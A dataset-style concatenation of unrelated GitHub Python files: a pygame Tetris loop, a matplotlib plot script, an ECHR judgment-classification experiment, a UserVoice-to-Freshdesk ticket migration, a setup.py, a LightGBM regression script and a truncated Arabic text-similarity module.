        # Imported here to avoid circular imports at module load time.
        from routes.Container_routes import container_bp
        from routes.Auth_routes import auth_bp
        app.register_blueprint(container_bp, url_prefix='/api/v1/weblab')
        app.register_blueprint(auth_bp, url_prefix='/api/v1/auth')
        db.create_all()
    return app
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "models.db.db.init_app",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "models.db.db",
... |
14905473093 | import sys
from time import sleep
import pygame
from settings import Settings
import game_functions as gf
# from tetrominos import IShape
from tetrominos import IShape
def run_game():
    """Initialise pygame and run the draw/rotate loop until the user quits."""
    pygame.init()
    # Load game settings.
    settings = Settings()
    screen = pygame.display.set_mode(
        (settings.screen_width, settings.screen_height))
    pygame.display.set_caption(settings.title)
    piece = IShape(settings)
    while True:
        # Quit on window close or on the 'q' key.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                sys.exit()
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_q:
                sys.exit()
        screen.fill(settings.color['white'])
        # Draw the grid lines, then the current piece.
        gf.show_grid(settings, screen)
        piece.draw(screen)
        piece.rotate()
        sleep(1)
        pygame.display.flip()


if __name__ == '__main__':
    run_game()
| DeepWalter/python-projects | tetris/tetris.py | tetris.py | py | 1,057 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "settings.Settings",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pygame.display"... |
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import matplotlib.dates as mdates

# Usage: plot_raw_and_processed.py <processed.csv> <raw.csv>
fin = sys.argv[1]
fin_raw = sys.argv[2]
font = {'size': 14}
matplotlib.rc('font', **font)
data = pd.read_csv(fin, parse_dates=True, index_col=0)
data_raw = pd.read_csv(fin_raw, parse_dates=True, index_col=0)
fig, ax = plt.subplots(figsize=(14, 8))
ax.plot(data.index, data['load_kg'], 'k')
ax.plot(data_raw.index, data_raw['load_kg'], 'g')
plt.fill_between(data.index, ax.get_ylim()[0], data['load_kg'], color=(1, 0.2, 0.2, 0.2))
plt.minorticks_on()
fig.autofmt_xdate()
# Use a more precise date string for the x axis locations in the toolbar.
ax.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax.grid(which='major', axis='both', linewidth=1.5, color='gray')
ax.xaxis.grid(True, 'minor', color='gray', alpha=0.3, ls='-', lw=1)
ax.yaxis.grid(True, 'minor', color='gray', alpha=0.3, ls='-', lw=1)
ax.set_xlabel('datetime')
ax.set_ylabel('load kg')
# Fix: plt.grid's first positional argument is the boolean `visible`; the
# original passed 'minor' there, which merely toggled the grid on. Select
# the minor grid explicitly via the `which` keyword.
plt.grid(True, which='minor')
plt.tight_layout()
fout = fin.replace('.csv', '_withRaw.pdf')
plt.savefig(fout)
plt.show()
{
"api_name": "sys.argv",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rc",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_n... |
20407001822 | #!/usr/bin/python
import argparse
import json
import os
from os import listdir, path
import copy
from pathlib import Path
import re
import pandas as pd
import numpy as np
from bidict import bidict
from scipy import sparse
from sklearn.model_selection import cross_validate, StratifiedKFold
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import MultiLabelBinarizer
from echr.utils.folders import make_build_folder
from echr.utils.logger import getlogger
from echr.utils.cli import TAB
from rich.markdown import Markdown
from rich.console import Console
from rich.table import Table
from rich.progress import (
Progress,
BarColumn,
TimeRemainingColumn,
)
from rich.panel import Panel
from rich.tree import Tree
from echr_experiments.config import ROUND_DIGITS, \
SEED, \
MULTICLASS_DESC_OUTPUT_FILE, \
MULTICLASS_OUTPUT_FILE, \
MULTICLASS_ARTICLES, \
MULTICLASS_FLAVORS, \
K_FOLD, \
AS_TIME_SERIES, \
MULTICLASS_CLASSIFIERS, \
DEFAULT_FEATURE_THRESHOLD
from echr_experiments.format import format_filter_output, format_method_output
from echr_experiments.data import load_ECHR_instance, generate_datasets_descriptors
from echr_experiments.scorers import make_scorers, process_score, calculate_average_cm
from echr_experiments.utils import update_classifier_result, \
update_dataset_filter_result, \
update_dataset_metadata, \
update_dataset_result, \
update_article_desc
seed = SEED
result_file = MULTICLASS_OUTPUT_FILE
articles = MULTICLASS_ARTICLES
flavors = MULTICLASS_FLAVORS
k_fold = K_FOLD
as_time_series = AS_TIME_SERIES
feature_threshold = DEFAULT_FEATURE_THRESHOLD
classifiers = MULTICLASS_CLASSIFIERS
import warnings
from pandas.core.common import SettingWithCopyWarning
warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)
log = getlogger()
def generate_outcomes_data(y_file, outcome_to_id, filter_threshold=100):
    """Parse the raw outcomes file into a DataFrame.

    Each input line is "<caseid> <article>:<outcome> ...". The returned
    frame has column 0 holding the first "<article>:<outcome>" token of the
    line and column 'caseid' holding the case identifier.

    NOTE(review): `outcome_to_id` and `filter_threshold` are accepted for
    interface compatibility but are currently unused (threshold filtering
    is done by the caller); the dead `f` lambda of the original was removed.
    """
    with open(y_file) as file:
        lines = file.readlines()
    outcomes = pd.DataFrame(lines)
    outcomes[0] = outcomes[0].apply(lambda x: x.strip().split())
    outcomes['caseid'] = outcomes[0].apply(lambda x: x[0])
    # Keep only the first outcome token per line, as before.
    outcomes[0] = outcomes[0].apply(lambda x: x[1])
    return outcomes
def map_outcome(art, x):
    """Return 1/0 when row *x* records a violation/no-violation of article
    *art*, and -1 when neither indicator is set."""
    if x[f'{art}:1'] == 1:
        return 1
    if x[f'{art}:0'] == 1:
        return 0
    return -1
def load_dataset(X_file, min_threshold=0):
    """Load a whitespace-separated token file and one-hot encode the tokens
    into sparse indicator columns (one column per distinct token).

    NOTE(review): `min_threshold` is currently unused and kept only for
    interface compatibility; the dead `f` lambda of the original was removed.
    """
    with open(X_file) as file:
        lines = file.readlines()
    X = pd.DataFrame(lines)
    # Sort each line's tokens for a stable column ordering.
    X[0] = X[0].apply(lambda x: sorted(x.strip().split()))
    # One-hot encode the token lists into a sparse matrix joined back on index.
    mlb = MultiLabelBinarizer(sparse_output=True)
    X = X.join(
        pd.DataFrame.sparse.from_spmatrix(
            mlb.fit_transform(X.pop(0)),
            index=X.index,
            columns=mlb.classes_))
    return X
def run(console, build, force):
    """Run the full multiclass cross-validation experiment: build the outcome
    matrix, encode classes, then cross-validate every classifier on every
    dataset flavor, persisting results incrementally."""
    __console = console
    global print
    # Route all module-level print() calls through the rich console.
    print = __console.print
    outcomes_path = 'data/input/datasets/'
    raw_outcome_file = Path(outcomes_path) / 'outcomes.txt'
    outcome_matrix_file = Path(outcomes_path) / 'outcomes_matrix.csv'
    print(Markdown("- **Prepare outcome matrix**"))
    OUTCOME_TO_ID = 'data/input/datasets/outcomes_variables.json'
    with open(OUTCOME_TO_ID, 'r') as f:
        outcome_to_id = json.load(f)
    # NOTE(review): regeneration is currently forced; the cached branch below
    # is dead code (and binds `outcome_matrix`, not `outcomes_matrix`).
    if True: #not os.path.isfile(outcome_matrix_file) or force:
        print(TAB + '> Generate the outcome matrix [green][DONE]')
        outcomes_matrix = generate_outcomes_data(raw_outcome_file, outcome_to_id, filter_threshold=100)
        outcomes_matrix.to_csv(outcome_matrix_file)
    else:
        print(TAB + '> Load the outcome matrix [green][DONE]')
        outcome_matrix = pd.read_csv(outcome_matrix_file)
    # Class encoding
    le = LabelEncoder()
    le.fit(outcomes_matrix[0])
    mapping_class = dict(zip(le.classes_, le.transform(le.classes_)))
    outcomes_matrix['decision'] = le.transform(outcomes_matrix[0])
    outcomes_matrix['article'] = outcomes_matrix[0].apply(lambda x: x.split(':')[0])
    CM = []  # Confusion matrices
    # Keep only the articles with more than 100 cases.
    count = outcomes_matrix['article'].value_counts()
    count = json.loads(count.to_json())
    count = {k: v for k, v in count.items() if v > 100}
    articles_to_keep = list(count.keys())
    outcomes_matrix = outcomes_matrix[outcomes_matrix['article'].isin(articles_to_keep)]
    # Re-encode the classes after filtering.
    le = LabelEncoder()
    le.fit(outcomes_matrix[0])
    mapping_class = dict(zip(le.classes_, le.transform(le.classes_)))
    c_outcomes = bidict(outcome_to_id)
    # Per-article descriptive statistics (size, violation counts, prevalence).
    metadata = json.loads(outcomes_matrix['article'].value_counts().to_json())
    metadata = {k: {'Size': v, 'Article': c_outcomes.inverse[int(k)]} for k, v in metadata.items()}  # c_outcomes.inverse[int(k)]
    for art, mdata in metadata.items():
        mdata['Violation'] = outcomes_matrix[outcomes_matrix[0] == f'{art}:1'].shape[0]
        mdata['No-Violation'] = outcomes_matrix[outcomes_matrix[0] == f'{art}:0'].shape[0]
        mdata['Prevalence'] = mdata['Violation'] / (mdata['Violation'] + mdata['No-Violation'])
    update_article_desc('Multiclass', metadata, MULTICLASS_DESC_OUTPUT_FILE)
    print(TAB + '> Update dataset description [green][DONE]')
    print(Markdown("- **Experiment summary**"))
    FLAVORS = {'Descriptive only': 'descriptive.txt', 'Bag-of-Words only': 'BoW.txt', 'Descriptive and Bag-of-Words': 'descriptive+BoW.txt'}
    print(f" | Flavors: {len(FLAVORS)}")
    print(f" | Methods: {len(classifiers)}")
    print(f" = {len(FLAVORS) * len(classifiers)} cross-validation procedures")
    print(f" = Take some :coffee: or :tea: and relax")
    # Resume from previous results when the output file already exists.
    try:
        f = open(result_file, "r")
        exp_results = json.loads(f.read())
        print(TAB + '> Load existing results [green][DONE]')
    except Exception as e:
        exp_results = {}
        print(TAB + '> No previous results [green][DONE]')
    # Summary table of what is already done vs. pending.
    table = Table(title="Cross-Validation Summary")
    table.add_column("Flavor", style="cyan", no_wrap=True)
    table.add_column("Method", justify="right", style="blue")
    table.add_column("Status", justify="right", style="green")
    for i, flavor in enumerate(FLAVORS.keys()):
        for k, method in enumerate(classifiers.keys()):
            dataset_name = f'Multiclass - {flavor}'
            status = exp_results.get(dataset_name, {}).get('methods', {}).get(method, None)
            status = '[green]DONE' if status else None
            table.add_row(flavor if k == 0 else None, method, status)
    print(table)
    for flavor, features_file in FLAVORS.items():
        print(Panel(f'[bold yellow] Cross-Validation Flavor {flavor.upper()}'), justify="center")
        print(Markdown("- **Prepare dataset**"))
        dataset_path = Path(outcomes_path) / features_file
        X = load_dataset(dataset_path)
        X = pd.DataFrame(X)
        # Align feature rows with the filtered outcome rows.
        X = X[X.index.isin(outcomes_matrix.index)]
        print(TAB + '> Load the dataset [green][DONE]')
        if flavor != 'Bag-of-Words':
            # Remove '0:' columns (article-0 indicator features).
            to_drop = [e for e in X.columns if e.startswith('0:')]
            X.drop(columns=to_drop, inplace=True)
            print(TAB + '> Drop unecessary columns [green][DONE]')
        print(Markdown(f"- **Cross-Validate**"))
        y = outcomes_matrix['decision']
        o = {'name': f'Multiclass - {flavor}'}
        dataset_name = o['name']
        if dataset_name not in exp_results:
            exp_results[dataset_name] = {}
        #format_filter_output(dataset_name, o)
        update_dataset_result(dataset_name, o, result_file)
        update_dataset_filter_result(dataset_name, o, result_file)
        metadata = exp_results.get(dataset_name, {}).get('filter', {})
        metadata['size'] = metadata.get('size', int(y.shape[0]))
        #metadata['violation'] = metadata.get('violation', int(y_art.sum()))
        #metadata['non_violation'] = metadata['size'] - metadata['violation']
        #metadata['prevalence'] = float(metadata['violation']) / metadata['size']
        update_dataset_metadata(dataset_name, metadata, result_file)
        print(TAB + '> Generate dataset metadata [green][DONE]')
        #if flavor == 'Descriptive only':
        #    update_article_desc(art, metadata, MULTICLASS_DESC_OUTPUT_FILE)
        #    print(TAB + '> Update dataset description [green][DONE]')
        CM = []
        for classifier_name, classifier in classifiers.items():
            print(TAB + f'> [bold]{classifier_name}')
            # Skip classifiers that already have persisted results.
            if exp_results.get(dataset_name, {}).get('methods', {}).get(classifier_name, None):
                print(TAB + ' тоб Cross-Validation results already exist. [green][SKIP]')
            else:
                try:
                    scoring = make_scorers(multiclass=True, CM=CM)
                    # NOTE(review): TimeSeriesSplit is not imported at the top
                    # of the file, so this branch would raise NameError if
                    # as_time_series were ever True -- confirm.
                    cv = TimeSeriesSplit(n_splits=k_fold) if as_time_series \
                        else StratifiedKFold(n_splits=k_fold)  # , random_state=seed)
                    #scores = cross_validate(classifier, X_art.to_numpy(), y_art.to_numpy(),
                    scores = cross_validate(classifier, X, y,
                                            cv=cv,
                                            scoring=scoring,
                                            return_train_score=True,
                                            verbose=10,
                                            n_jobs=None, error_score='raise')
                    classifier_output = process_score(scores, scoring, seed, multilabel=True)
                    # Average the per-fold confusion matrices collected via CM.
                    cm = calculate_average_cm(CM, train_score=True)
                    classifier_output['confusion_matrix'] = cm
                    classifier_output['confusion_matrix']['class_labels'] = list(le.classes_)  # list(outcomes_matrix[0].value_counts().index) #list(le.classes_)
                    #format_method_output(classifier_name, classifier_output)
                    update_classifier_result(
                        dataset_name,
                        classifier_name,
                        classifier_output,
                        result_file
                    )
                    pass
                except Exception as e:
                    # Best-effort: report and continue with the next classifier.
                    print(e)
def main(args):
    """Entry point: build a recording console and run the experiment pipeline.

    :param args: parsed CLI namespace with .build (database path) and .force.
    """
    # record=True lets rich export the console output afterwards.
    console = Console(record=True)
    run(console, args.build, args.force)
def parse_args(parser):
    """Parse the command line with the supplied argparse parser and return the namespace."""
    return parser.parse_args()
if __name__ == "__main__":
    # CLI: --build points at the ECHR database build directory;
    # -f/--force re-runs cross-validation even when results already exist.
    parser = argparse.ArgumentParser(description='Multiclass experiments')
    parser.add_argument('--build', type=str, default="./build/echr_database/")
    parser.add_argument('-f', '--force', action='store_true')
    args = parse_args(parser)
    main(args)
| echr-od/ECHR-OD_predictions | multiclass_experiments.py | multiclass_experiments.py | py | 11,588 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "echr_experiments.config.SEED",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "echr_experiments.config.MULTICLASS_OUTPUT_FILE",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "echr_experiments.config.MULTICLASS_ARTICLES",
"line_number": 51,
... |
27559044703 | import urllib3
urllib3.disable_warnings()
import os.path
import json
import requests
import uservoice
import time
from config import *
def send_ticket_to_freshdesk(ticket, ticket_number):
    """Post a single ticket payload to the Freshdesk v2 API.

    Returns the parsed JSON response on success (HTTP 200/201) or an
    empty dict on failure, after printing the ticket number and error body.
    """
    endpoint = "https://%s.freshdesk.com/api/v2/tickets" % FD_SUBDOMAIN
    # Throttle: one request per second to stay under the API rate limit.
    time.sleep(1)
    response = requests.post(
        endpoint,
        data=json.dumps(ticket),
        auth=(FD_API_KEY, "api"),
        headers={'Content-Type': 'application/json'},
        verify=False,
    )
    if response.status_code in (200, 201):
        return response.json()
    print('x %s: %s' % (ticket_number, response.text))
    return {}
def process_uv_ticket(uv_ticket):
    """Convert one UserVoice ticket into a Freshdesk payload and send it.

    Status starts as 5 and flips to 4 as soon as any admin response is
    found among the messages. The HTML description links back to the
    original UserVoice ticket and appends every message oldest-first.
    """
    description = "<b>From UserVoice:</b> <a href=\"https://%s.uservoice.com/admin/tickets/%s\">%s</a><br/>" % (
        UV_SUBDOMAIN,
        uv_ticket['ticket_number'],
        uv_ticket['ticket_number']
    )
    status = 5
    # Messages are stored newest-first; iterate in chronological order.
    for message in uv_ticket['messages'][::-1]:
        if message['is_admin_response']:
            status = 4
        description += (
            "<br/>---<br/>"
            "<b>%s <%s></b><br/>"
            "%s<br/>"
            "<i>%s</i><br/>"
            "<br/>%s<br/><br/>"
        ) % (
            message['sender']['name'],
            message['sender']['email'],
            message['created_at'],
            message['referrer'],
            message['body'],
        )
    ticket = {
        'status': status,
        'priority': 1,
        'source': 2,
        'email': uv_ticket['contact']['email'],
        'name': uv_ticket['contact']['name'],
        'description': description,
        'subject': uv_ticket['subject'],
        'tags': ['uservoice'],
    }
    send_ticket_to_freshdesk(ticket, uv_ticket['ticket_number'])
def download_uv_tickets(uv_ticket_outfile, total_records):
    '''thanks https://github.com/drmarshall/zendesk_migration'''
    # Download all closed support tickets page-by-page (100 per page) and
    # write them as JSON-lines: one JSON array of tickets per line.
    uv_client = uservoice.Client(UV_SUBDOMAIN, UV_API_KEY, UV_API_SECRET)
    base_url = "/api/v1/tickets.json?"
    # Self-assignment kept as-is; total_records is refreshed from every
    # API response below anyway.
    total_records = total_records
    tickets = {}  # NOTE(review): never populated or used — dead variable.
    page = 1
    print("Downloading page %s" % str(page))
    with open(uv_ticket_outfile, "w") as f:
        # NOTE(review): the loop stops once page*100 reaches total_records,
        # which looks like it may skip a final partial page — confirm
        # against the UserVoice pagination semantics.
        while total_records > page*100:
            request = base_url+"page="+str(page)+"&per_page=100"+"&type=Support+Request&state=closed"
            response = uv_client.get(request)
            f.write(json.dumps(response['tickets'])+"\n")
            print(json.dumps(response['response_data']))
            # Advance using the page number echoed back by the API.
            page = response['response_data']['page'] + 1
            total_records = response['response_data']['total_records']
            print("Downloading page %s of %s pages" % (str(page), str(total_records/100)))
def import_tickets_to_freshdesk(uv_ticket_outfile):
    """Replay a JSON-lines UserVoice export into Freshdesk.

    Each line of *uv_ticket_outfile* holds a JSON array of tickets (as
    written by download_uv_tickets); every ticket is converted and sent
    via process_uv_ticket, printing "current/total" progress.
    """
    # Bug fix: the export path parameter was previously ignored and the
    # file name "uservoice_export.json" was hard-coded; honour the argument.
    with open(uv_ticket_outfile, "r") as uservoice_export:
        tickets = []
        for line in uservoice_export:
            tickets.extend(json.loads(line))
    total = len(tickets)
    for current, ticket in enumerate(tickets, start=1):
        process_uv_ticket(ticket)
        print("%s/%s" % (current, total))
if __name__ == '__main__':
    # Download the closed-ticket export once, then import it into Freshdesk.
    uv_ticket_outfile = "uservoice_export.json"
    # Skip the (slow) download when a previous export already exists on disk.
    if not os.path.isfile(uv_ticket_outfile):
        download_uv_tickets(uv_ticket_outfile, total_records=60000)
    import_tickets_to_freshdesk(uv_ticket_outfile)
| melalj/uservoice-to-freshdesk | main.py | main.py | py | 3,071 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "requests.post",
"li... |
43063771699 | from typing import TYPE_CHECKING, Optional
from nonebot import Bot
from nonebot.internal.adapter import Event
from nonebot_plugin_access_control_api.subject.model import SubjectModel
from nonebot_plugin_access_control_api.subject.manager import SubjectManager
if TYPE_CHECKING:
from nonebot.adapters.kaiheila.event import User
from nonebot.adapters.kaiheila.event import Event as KaiheilaEvent
OFFER_BY = "nonebot_plugin_access_control"
def extract_kaiheila_role(bot: Bot, event: Event, manager: SubjectManager):
    """Register Kaiheila guild-role subjects for the event's author.

    Does nothing for non-Kaiheila bots or for events without an author.
    One SubjectModel per role is built (sorted for determinism) and
    inserted so that role subjects are matched before the channel subject.
    """
    if bot.type != "Kaiheila":
        return
    event: KaiheilaEvent
    guild_id: Optional[str] = event.extra.guild_id
    # (Removed a dead expression that computed a channel/group id via
    # getattr(...) or getattr(...) but discarded the result.)
    author: Optional["User"] = event.extra.author
    if author is not None:
        subjects = [
            SubjectModel(
                f"kaiheila:g{guild_id}.role_{role}", OFFER_BY, "kaiheila:guild.role"
            )
            for role in sorted(author.roles)
        ]
        # Insert before platform:guild:channel so role subjects take priority.
        manager.insert_before("platform:guild:channel", *subjects)
| bot-ssttkkl/nonebot-plugin-access-control | src/nonebot_plugin_access_control/subject/extractor/builtin/kaiheila.py | kaiheila.py | py | 1,158 | python | en | code | 30 | github-code | 1 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nonebot.Bot",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "nonebot.internal.adapter.Event",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "nonebo... |
17038581303 | import lightgbm as lgb
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
def rmsle(y_true, y_pred):
    """Root Mean Squared Logarithmic Error.

    RMSLE = sqrt(mean((log(1 + y_true) - log(1 + y_pred)) ** 2)).
    Bug fix: np.log1p(x) already computes log(1 + x), so no extra "+ 1"
    offset is needed — the original computed log(2 + y) instead.
    """
    assert len(y_true) == len(y_pred)
    return np.sqrt(np.mean(np.power(np.log1p(y_true) - np.log1p(y_pred), 2)))
def rmse(y_true, y_pred):
    """Root mean squared error between two equal-length arrays."""
    assert len(y_true) == len(y_pred)
    diff = y_true - y_pred
    return np.sqrt(np.mean(diff * diff))
# Train a LightGBM regressor on the pre-selected features and report the
# RMSE on a 10% hold-out split.
df = pd.read_csv('./data/feature_select_new.csv', header=0)
df_ans = pd.read_csv('./data/ans.csv', names=['ans'])
x_train, x_valid, y_train, y_valid = train_test_split(df, df_ans, test_size=0.10, random_state=7)
lgb_train = lgb.Dataset(x_train, y_train)
lgb_eval = lgb.Dataset(x_valid, y_valid,
                       # reference=lgb_train
                       )
model_param = {'lr': 0.005, 'depth': 10, 'tree': 500, 'leaf': 10, 'sample': 0.9, 'seed': 3}
params = {
    'task': 'train',
    'boosting_type': 'gbdt',
    'objective': 'regression_l2',
    'metric': {'l2', 'l1'},
    'max_depth': model_param['depth'],
    'num_leaves': model_param['leaf'],
    'learning_rate': model_param['lr'],
    'feature_fraction': 1,
    'bagging_fraction': model_param['sample'],
    'bagging_freq': 1,
    'bagging_seed': model_param['seed'],
    'verbose': 0,
    # Bug fix: the original dict listed 'min_data_in_leaf' twice (20, then
    # 1); Python keeps only the last value, so the effective value 1 is kept.
    'min_data_in_leaf': 1,
    'min_data_in_bin': 1
}
model = lgb.train(params, lgb_train, num_boost_round=5000, #tree
                  valid_sets=lgb_eval,
                  feval=rmse,
                  early_stopping_rounds=30,
                  verbose_eval=True
                  )
preds = model.predict(x_valid)
# Bug fix: `y` was undefined here — the hold-out target is `y_valid`.
print(rmse(y_valid, preds))
#
# # print("調參1:提高準確率")
# min_merror = float('Inf')
# for num_leaves in range(20, 450, 100):
# for max_depth in range(5, 16, 5):
# params['num_leaves'] = num_leaves
# params['max_depth'] = max_depth
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=10,
# verbose_eval=True
# )
# mean_merror = pd.Series(cv_results['l2-mean']).min()
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['num_leaves'] = num_leaves
# best_params['max_depth'] = max_depth
# params['num_leaves'] = best_params['num_leaves']
# params['max_depth'] = best_params['max_depth']
# # overfitting
# print("調参2:降低overfit")
# for max_bin in range(1, 155, 25):
# for min_data_in_leaf in range(10, 101, 10):
# params['max_bin'] = max_bin
# params['min_data_in_leaf'] = min_data_in_leaf
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['max_bin'] = max_bin
# best_params['min_data_in_leaf'] = min_data_in_leaf
#
# params['min_data_in_leaf'] = best_params['min_data_in_leaf']
# params['max_bin'] = best_params['max_bin']
# print params
# print("調参3:降低overfit")
# for feature_fraction in [i / 10.0 for i in range(0, 11, 2)]:
# for bagging_fraction in [i / 10.0 for i in range(0, 11, 2)]:
# for bagging_freq in range(0, 50, 5):
# params['feature_fraction'] = feature_fraction
# params['bagging_fraction'] = bagging_fraction
# params['bagging_freq'] = bagging_freq
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
# boost_rounds = pd.Series(cv_results['l2-mean']).argmin()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['feature_fraction'] = feature_fraction
# best_params['bagging_fraction'] = bagging_fraction
# best_params['bagging_freq'] = bagging_freq
#
# params['feature_fraction'] = best_params['feature_fraction']
# params['bagging_fraction'] = best_params['bagging_fraction']
# params['bagging_freq'] = best_params['bagging_freq']
# print params
# print("調参4:降低overfit")
# for lambda_l1 in [i / 10.0 for i in range(0, 11, 2)]:
# for lambda_l2 in [i / 10.0 for i in range(0, 11, 2)]:
# for min_split_gain in [i / 10.0 for i in range(0, 11, 2)]:
# params['lambda_l1'] = lambda_l1
# params['lambda_l2'] = lambda_l2
# params['min_split_gain'] = min_split_gain
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['lambda_l1'] = lambda_l1
# best_params['lambda_l2'] = lambda_l2
# best_params['min_split_gain'] = min_split_gain
#
# params['lambda_l1'] = best_params['lambda_l1']
# params['lambda_l2'] = best_params['lambda_l2']
# params['min_split_gain'] = best_params['min_split_gain']
#
# print(model_param)
# print(params)
| sklinl/Competition_Tunghai | lg.py | lg.py | py | 5,626 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.sqrt",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.power",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.log1p",
"line_number": 9,
... |
4626498979 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# {# pkglts, pysetup.kwds
# format setup arguments
import os
from os import walk
from os.path import abspath, normpath, dirname
from os.path import join as pj
from setuptools import setup, find_packages
short_descr = "Python/Visualea interface to Caribu Light model"
# Long description = README plus changelog (with its marker line removed).
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
# find version number in src/alinea/caribu/version.py
version = {}
with open("src/alinea/caribu/version.py") as fp:
    exec(fp.read(), version)
version_caribu = version["__version__"]
data_files = []
# Prefix length used by data_rel_pth() to strip "src/caribu_data/" below.
nb = len(normpath(abspath("src/caribu_data"))) + 1
def data_rel_pth(pth):
    """Return *pth* rewritten relative to the package data directory."""
    absolute = normpath(abspath(pth))
    return absolute[nb:]
"""
for root, dnames, fnames in walk("src/caribu_data"):
for name in fnames:
data_files.append(data_rel_pth(pj(root, name)))
"""
setup_kwds = dict(
    name='alinea.caribu',
    version=version_caribu,
    description=short_descr,
    long_description=readme + '\n\n' + history,
    author="Christian Fournier, Michael Chelle, Christophe Pradal ",
    author_email="Christian.Fournier@supagro.inra.fr, michael.chelle@grignon.inra.fr, christophe dot pradal _at_ cirad fr ",
    url='https://github.com/openalea-incubator/caribu',
    license='INRA_License_agreement',
    zip_safe=False,
    packages=find_packages('src'),
    package_dir={'': 'src'},
    include_package_data=True,
    package_data={},
    entry_points={},
    keywords='openalea, FSPM, light',
    #test_suite='nose.collector',
    )
# #}
# change setup_kwds below before the next pkglts tag
#setup_kwds['setup_requires'] = ['openalea.deploy']
# SCons build outputs (binaries, libraries, headers) live under build-scons/.
build_prefix = pj(abspath(dirname(__file__)),"build-scons")
setup_kwds['scons_scripts'] = ['SConstruct']
setup_kwds['bin_dirs'] = {'bin': build_prefix + '/bin'}
setup_kwds['lib_dirs'] = {'lib' : build_prefix+'/lib' }
setup_kwds['inc_dirs'] = { 'include' : build_prefix+'/include' }
# Register the VisuAlea component package entry point.
setup_kwds['entry_points']['wralea'] = ['alinea.caribu = alinea.caribu_wralea']
#setup_kwds['entry_points']['console_scripts'] = []
setup_kwds['package_data'][''] = ['*.can', '*.R', '*.8', '*.opt', '*.light', '*.csv', '*.png']
# Namespace-package / openalea.deploy handling is skipped inside conda envs.
if ('CONDA_PREFIX' not in os.environ) and ('PREFIX' not in os.environ):
    setup_kwds['namespace_packages']=['alinea'] # Never used in a conda env...
    setup_kwds['setup_requires'] = ['openalea.deploy']
# do not change things below
# {# pkglts, pysetup.call
setup(**setup_kwds)
# #}
| openalea-incubator/caribu | setup.py | setup.py | py | 2,530 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "os.path.normpath",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.normpath",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
... |
26373489244 | import sys
from math import log, sqrt
from itertools import combinations
import json
from nltk.stem.porter import *
from nltk.stem.snowball import ArabicStemmer
from string import punctuation
# Extend the punctuation set with Arabic punctuation, curly quotes and digits.
punctuation += '،؛؟”0123456789“'
stopWords = open(".../arabic_stopwords.txt",encoding = "utf-8").read().splitlines()
words=" ".join(stopWords)
# Frozen set of Arabic stop-words for O(1) membership tests.
STOPWORDS = frozenset({ w for w in words.split() if w })
def remove_stopword(sentence):
    """Drop every stop-word token from a whitespace-separated sentence."""
    kept = [token for token in sentence.split() if token not in STOPWORDS]
    return " ".join(kept)
def snowballStemmer(word):
    """Stem a single Arabic word with NLTK's Snowball ArabicStemmer."""
    return ArabicStemmer().stem(word)
def cosine_distance(a, b):
    """Dot product of the "tfidf" vectors of two documents.

    With the unit-length vectors produced by normalize() this equals the
    cosine similarity; only tokens present in both documents contribute.
    """
    a_tfidf = a["tfidf"]
    return sum(
        (weight * a_tfidf[token]
         for token, weight in b["tfidf"].items()
         if token in a_tfidf),
        0.0,
    )
def normalize(features):
    """Scale a token->weight dict in place to unit Euclidean length.

    Empty dicts and all-zero vectors are returned unchanged; the (possibly
    mutated) dict is always returned.
    """
    if features:
